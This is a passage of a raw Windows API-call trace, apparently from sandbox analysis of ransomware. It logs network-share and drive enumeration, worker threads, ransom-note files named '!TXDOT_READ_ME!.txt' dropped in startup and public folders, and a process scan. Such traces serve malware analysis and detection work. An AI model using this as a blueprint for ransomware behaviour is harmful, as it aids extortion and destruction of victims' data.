0xe4d150 [0059.854] OpenServiceW (hSCManager=0xe4d150, lpServiceName="wbengine", dwDesiredAccess=0x2c) returned 0xe4d178 [0059.855] QueryServiceStatusEx (in: hService=0xe4d178, InfoLevel=0x0, lpBuffer=0x95fa94, cbBufSize=0x24, pcbBytesNeeded=0x95fac0 | out: lpBuffer=0x95fa94, pcbBytesNeeded=0x95fac0) returned 1 [0059.855] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.855] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.856] GetSystemWindowsDirectoryW (in: lpBuffer=0x854868, uSize=0x104 | out: lpBuffer="C:\\WINDOWS") returned 0xa [0059.856] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x8325b0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x95fe04 | out: lpThreadId=0x95fe04*=0xddc) returned 0x3f8 [0059.856] CloseHandle (hObject=0x3f8) returned 1 [0059.856] Sleep (dwMilliseconds=0x3a98) [0069.900] GetSystemInfo (in: lpSystemInfo=0x95fde4 | out: lpSystemInfo=0x95fde4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0069.900] GetProcessHeap () returned 0xe30000 [0069.900] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x90) returned 0xe9f390 [0069.900] GetProcessHeap () returned 0xe30000 [0069.900] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x90) returned 0xe9f850 [0069.900] GetProcessHeap () returned 0xe30000 [0069.900] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x90) returned 0xe9f130 [0069.900] GetProcessHeap () returned 0xe30000 [0069.900] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x90) returned 0xe9fed8 [0069.900] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3f8 [0069.900] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3fc [0069.900] GetProcessHeap () returned 0xe30000 [0069.900] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x7d80) returned 0xea0078 [0069.900] GetProcessHeap () returned 0xe30000 [0069.900] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x800080) returned 0x2ef0020 [0069.919] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831b00, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x95fdc8 | out: lpThreadId=0x95fdc8*=0xbdc) returned 0x404 [0069.919] GetCurrentThread () returned 0xfffffffe [0069.919] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x0) returned 0x0 [0069.920] SetThreadPriorityBoost (hThread=0x404, bDisablePriorityBoost=0) returned 1 [0069.920] CloseHandle (hObject=0x404) returned 1 [0069.920] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x404 [0069.920] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x408 [0069.920] GetProcessHeap () returned 0xe30000 [0069.920] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x7d80) returned 0xea7e00 [0069.921] GetProcessHeap () returned 0xe30000 [0069.921] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x800080) returned 0x380d020 [0069.940] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831b00, lpParameter=0x1, dwCreationFlags=0x0, lpThreadId=0x95fdc8 | out: lpThreadId=0x95fdc8*=0x428) returned 0x40c [0069.940] GetCurrentThread () returned 0xfffffffe [0069.940] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x1) returned 0x1 [0069.940] SetThreadPriorityBoost (hThread=0x40c, bDisablePriorityBoost=0) returned 1 [0069.940] CloseHandle (hObject=0x40c) returned 1 [0069.940] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x40c [0069.940] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x410 [0069.940] GetProcessHeap () returned 0xe30000 [0069.940] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x7d80) returned 0xeafb88 [0069.941] GetProcessHeap () returned 0xe30000 [0069.941] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x800080) returned 0x415b020 [0070.008] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831b00, lpParameter=0x2, dwCreationFlags=0x0, lpThreadId=0x95fdc8 | out: lpThreadId=0x95fdc8*=0x168) returned 0x414 [0070.008] GetCurrentThread () returned 0xfffffffe [0070.008] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x2) returned 0x0 [0070.009] SetThreadPriorityBoost (hThread=0x414, bDisablePriorityBoost=0) returned 1 [0070.009] CloseHandle (hObject=0x414) returned 1 [0070.009] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x414 [0070.009] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x418 [0070.009] GetProcessHeap () returned 0xe30000 [0070.009] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x7d80) returned 0xeb7910 [0070.009] GetProcessHeap () returned 0xe30000 [0070.009] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x800080) returned 0x4aa0020 [0070.028] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831b00, lpParameter=0x3, dwCreationFlags=0x0, lpThreadId=0x95fdc8 | out: lpThreadId=0x95fdc8*=0xee4) returned 0x41c [0070.030] GetCurrentThread () returned 0xfffffffe [0070.030] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x3) returned 0x1 [0070.030] SetThreadPriorityBoost (hThread=0x41c, bDisablePriorityBoost=0) returned 1 [0070.030] CloseHandle (hObject=0x41c) returned 1 [0070.030] GetSystemWindowsDirectoryW (in: lpBuffer=0x8583c0, uSize=0x104 | out: lpBuffer="C:\\WINDOWS") returned 0xa [0070.030] GetEnvironmentVariableW (in: lpName="ProgramFiles", lpBuffer=0x8585c8, nSize=0x104 | out: lpBuffer="C:\\Program Files (x86)") returned 0x16 [0070.030] GetNativeSystemInfo (in: lpSystemInfo=0x95fdcc | out: lpSystemInfo=0x95fdcc*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0070.030] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0070.030] GetProcAddress (hModule=0x772d0000, lpProcName="IsWow64Process") returned 0x772e5a20 [0070.031] GetCurrentProcess () returned 0xffffffff [0070.031] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x95fdfc | out: Wow64Process=0x95fdfc) returned 1 [0070.031] GetEnvironmentVariableW (in: lpName="ProgramW6432", lpBuffer=0x8587d0, nSize=0x104 | out: lpBuffer="C:\\Program Files") returned 0x10 [0070.031] GetSystemTime (in: lpSystemTime=0x95fe28 | out: lpSystemTime=0x95fe28*(wYear=0x7e4, wMonth=0x6, wDayOfWeek=0x5, wDay=0x1a, wHour=0xf, wMinute=0x22, wSecond=0x28, wMilliseconds=0x2c5)) [0070.031] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x95fe28, lpLocalTime=0x95fe18 | out: lpLocalTime=0x95fe18) returned 1 [0070.031] SetErrorMode (uMode=0x8003) returned 0x0 [0070.031] SetProcessShutdownParameters (dwLevel=0x100, dwFlags=0x0) returned 1 [0070.032] GetLogicalDriveStringsW (in: nBufferLength=0x104, lpBuffer=0x8589f0 | out: lpBuffer="C:\\") returned 0x4 [0070.032] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831bb0, lpParameter=0x8589f0, dwCreationFlags=0x0, lpThreadId=0x95fe04 | out: lpThreadId=0x95fe04*=0xec8) returned 0x41c [0070.032] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x95f9cc | out: lphEnum=0x95f9cc*=0xec2430) returned 0x0 [0071.445] GetProcessHeap () returned 0xe30000 [0071.445] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x1080) returned 0xec90c0 [0071.445] WNetEnumResourceW (in: hEnum=0xec2430, lpcCount=0x95f9d0, lpBuffer=0xec90c0, lpBufferSize=0x95f9c8 | out: lpcCount=0x95f9d0, lpBuffer=0xec90c0, lpBufferSize=0x95f9c8) returned 0x0 [0071.445] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xec90c0, lphEnum=0x95f9a4 | out: lphEnum=0x95f9a4*=0xe47820) returned 0x0 [0071.447] GetProcessHeap () returned 0xe30000 [0071.447] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x1080) returned 0xecab68 [0071.448] WNetEnumResourceW (in: hEnum=0xe47820, lpcCount=0x95f9a8, lpBuffer=0xecab68, lpBufferSize=0x95f9a0 | out: lpcCount=0x95f9a8, lpBuffer=0xecab68, lpBufferSize=0x95f9a0) returned 0x103 [0071.448] GetProcessHeap () returned 0xe30000 [0071.448] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0071.448] WNetCloseEnum (hEnum=0xe47820) returned 0x0 [0071.448] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xec90e0, lphEnum=0x95f9a4 | out: lphEnum=0x95f9a4*=0xe47820) returned 0x4b8 [0085.061] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xec9100, lphEnum=0x95f9a4 | out: lphEnum=0x95f9a4*=0xe47820) returned 0x4c6 [0085.062] WNetEnumResourceW (in: hEnum=0xec2430, lpcCount=0x95f9d0, lpBuffer=0xec90c0, lpBufferSize=0x95f9c8 | out: lpcCount=0x95f9d0, lpBuffer=0xec90c0, lpBufferSize=0x95f9c8) returned 0x103 [0085.062] GetProcessHeap () returned 0xe30000 [0085.062] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec90c0 | out: hHeap=0xe30000) returned 1 [0085.062] WNetCloseEnum (hEnum=0xec2430) returned 0x0 [0085.062] WaitForMultipleObjects (nCount=0x1, lpHandles=0x95f9ec*=0x41c, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0085.062] GetLogicalDriveStringsW (in: nBufferLength=0x104, lpBuffer=0x8589f0 | out: lpBuffer="C:\\") returned 0x4 [0085.062] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831bb0, lpParameter=0x8589f0, dwCreationFlags=0x0, lpThreadId=0x95fe04 | out: lpThreadId=0x95fe04*=0x1030) returned 0x458 [0085.063] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x95f9cc | out: lphEnum=0x95f9cc*=0xec27f0) returned 0x0 [0085.063] GetProcessHeap () returned 0xe30000 [0085.063] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x1080) returned 0xec90c0 [0085.063] WNetEnumResourceW (in: hEnum=0xec27f0, lpcCount=0x95f9d0, lpBuffer=0xec90c0, lpBufferSize=0x95f9c8 | out: lpcCount=0x95f9d0, lpBuffer=0xec90c0, lpBufferSize=0x95f9c8) returned 0x0 [0085.063] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xec90c0, lphEnum=0x95f9a4 | out: lphEnum=0x95f9a4*=0xe47920) returned 0x0 [0085.064] GetProcessHeap () returned 0xe30000 [0085.064] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x1080) returned 0xed31f0 [0085.064] WNetEnumResourceW (in: hEnum=0xe47920, lpcCount=0x95f9a8, lpBuffer=0xed31f0, lpBufferSize=0x95f9a0 | out: lpcCount=0x95f9a8, lpBuffer=0xed31f0, lpBufferSize=0x95f9a0) returned 0x103 [0085.064] GetProcessHeap () returned 0xe30000 [0085.064] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: hHeap=0xe30000) returned 1 [0085.064] WNetCloseEnum (hEnum=0xe47920) returned 0x0 [0085.064] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xec90e0, lphEnum=0x95f9a4 | out: lphEnum=0x95f9a4*=0xe47920) returned 0x4b8 [0097.429] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xec9100, lphEnum=0x95f9a4 | out: lphEnum=0x95f9a4*=0xe47920) returned 0x4c6 [0097.430] WNetEnumResourceW (in: hEnum=0xec27f0, lpcCount=0x95f9d0, lpBuffer=0xec90c0, lpBufferSize=0x95f9c8 | out: lpcCount=0x95f9d0, lpBuffer=0xec90c0, lpBufferSize=0x95f9c8) returned 0x103 [0097.430] GetProcessHeap () returned 0xe30000 [0097.430] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec90c0 | out: hHeap=0xe30000) returned 1 [0097.430] WNetCloseEnum (hEnum=0xec27f0) returned 0x0 [0097.430] WaitForMultipleObjects (nCount=0x1, lpHandles=0x95f9ec*=0x458, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0097.430] Sleep (dwMilliseconds=0x3e8) [0098.509] SHGetFolderPathW (in: hwnd=0x0, csidl=24, hToken=0x0, dwFlags=0x0, pszPath=0x95fbf4 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0098.517] StrCpyNW (in: psz1=0x95fbf4, psz2="!TXDOT_READ_ME!.txt", cchMax=260 | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0098.518] PathFileExistsW (pszPath="!TXDOT_READ_ME!.txt") returned 1 [0098.518] SHGetFolderPathW (in: hwnd=0x0, csidl=25, hToken=0x0, dwFlags=0x0, pszPath=0x95fbf4 | out: pszPath="C:\\Users\\Public\\Desktop") returned 0x0 [0098.519] StrCpyNW (in: psz1=0x95fbf4, psz2="!TXDOT_READ_ME!.txt", cchMax=260 | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0098.519] PathFileExistsW (pszPath="!TXDOT_READ_ME!.txt") returned 1 [0098.519] SHGetFolderPathW (in: hwnd=0x0, csidl=53, hToken=0x0, dwFlags=0x0, pszPath=0x95fbf4 | out: pszPath="C:\\Users\\Public\\Music") returned 0x0 [0098.521] StrCpyNW (in: psz1=0x95fbf4, psz2="!TXDOT_READ_ME!.txt", cchMax=260 | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0098.521] PathFileExistsW (pszPath="!TXDOT_READ_ME!.txt") returned 1 [0098.521] SHGetFolderPathW (in: hwnd=0x0, csidl=54, hToken=0x0, dwFlags=0x0, pszPath=0x95fbf4 | out: pszPath="C:\\Users\\Public\\Pictures") returned 0x0 [0098.522] StrCpyNW (in: psz1=0x95fbf4, psz2="!TXDOT_READ_ME!.txt", cchMax=260 | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0098.522] PathFileExistsW (pszPath="!TXDOT_READ_ME!.txt") returned 1 [0098.522] SHGetFolderPathW (in: hwnd=0x0, csidl=55, hToken=0x0, dwFlags=0x0, pszPath=0x95fbf4 | out: pszPath="C:\\Users\\Public\\Videos") returned 0x0 [0098.524] StrCpyNW (in: psz1=0x95fbf4, psz2="!TXDOT_READ_ME!.txt", cchMax=260 | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0098.524] PathFileExistsW (pszPath="!TXDOT_READ_ME!.txt") returned 1 [0098.524] GetSystemWindowsDirectoryA (in: lpBuffer=0x95fd04, uSize=0x104 | out: lpBuffer="C:\\WINDOWS") returned 0xa [0098.524] PathAppendA (in: pszPath="C:\\WINDOWS", pMore="CryptoGuard" | out: pszPath="C:\\WINDOWS\\CryptoGuard") returned 1 [0098.524] PathIsDirectoryA (pszPath="C:\\WINDOWS\\CryptoGuard") returned 0 [0098.524] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x468 [0098.530] Process32First (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.531] StrStrIA (lpFirst="[System Process]", lpSrch="cipher.exe") returned 0x0 [0098.532] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x69, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0098.532] StrStrIA (lpFirst="System", lpSrch="cipher.exe") returned 0x0 [0098.532] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0098.533] StrStrIA (lpFirst="smss.exe", lpSrch="cipher.exe") returned 0x0 [0098.533] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0098.533] StrStrIA (lpFirst="csrss.exe", lpSrch="cipher.exe") returned 0x0 [0098.533] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0098.534] StrStrIA (lpFirst="wininit.exe", lpSrch="cipher.exe") returned 0x0 [0098.534] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0098.534] StrStrIA (lpFirst="csrss.exe", lpSrch="cipher.exe") returned 0x0 [0098.534] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0098.535] StrStrIA (lpFirst="winlogon.exe", lpSrch="cipher.exe") returned 0x0 [0098.535] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0098.535] StrStrIA (lpFirst="services.exe", lpSrch="cipher.exe") returned 0x0 [0098.535] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0098.536] StrStrIA (lpFirst="lsass.exe", lpSrch="cipher.exe") returned 0x0 [0098.536] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.536] StrStrIA (lpFirst="svchost.exe", lpSrch="cipher.exe") returned 0x0 [0098.536] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0098.537] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="cipher.exe") returned 0x0 [0098.537] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0098.537] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="cipher.exe") returned 0x0 [0098.537] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.538] StrStrIA (lpFirst="svchost.exe", lpSrch="cipher.exe") returned 0x0 [0098.538] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0098.538] StrStrIA (lpFirst="dwm.exe", lpSrch="cipher.exe") returned 0x0 [0098.538] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x63, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.539] StrStrIA (lpFirst="svchost.exe", lpSrch="cipher.exe") returned 0x0 [0098.539] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.539] StrStrIA (lpFirst="svchost.exe", lpSrch="cipher.exe") returned 0x0 [0098.539] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.540] StrStrIA (lpFirst="svchost.exe", lpSrch="cipher.exe") returned 0x0 [0098.540] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.540] StrStrIA (lpFirst="svchost.exe", lpSrch="cipher.exe") returned 0x0 [0098.540] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.541] StrStrIA (lpFirst="svchost.exe", lpSrch="cipher.exe") returned 0x0 [0098.541] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.541] StrStrIA (lpFirst="svchost.exe", lpSrch="cipher.exe") returned 0x0 [0098.541] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.542] StrStrIA (lpFirst="svchost.exe", lpSrch="cipher.exe") returned 0x0 [0098.542] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.542] StrStrIA (lpFirst="svchost.exe", lpSrch="cipher.exe") returned 0x0 [0098.542] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.543] StrStrIA (lpFirst="svchost.exe", lpSrch="cipher.exe") returned 0x0 [0098.543] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.558] StrStrIA (lpFirst="svchost.exe", lpSrch="cipher.exe") returned 0x0 [0098.558] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0098.558] StrStrIA (lpFirst="spoolsv.exe", lpSrch="cipher.exe") returned 0x0 [0098.558] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.559] StrStrIA (lpFirst="svchost.exe", lpSrch="cipher.exe") returned 0x0 [0098.559] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0098.559] StrStrIA (lpFirst="audiodg.exe", lpSrch="cipher.exe") returned 0x0 [0098.559] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0098.560] StrStrIA (lpFirst="sihost.exe", lpSrch="cipher.exe") returned 0x0 [0098.560] Process32Next (in: hSnapshot=0x468, lppe=0x95f688 | out: lppe=0x95f688*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.560] StrStrIA (lpFirst="svchost.exe", 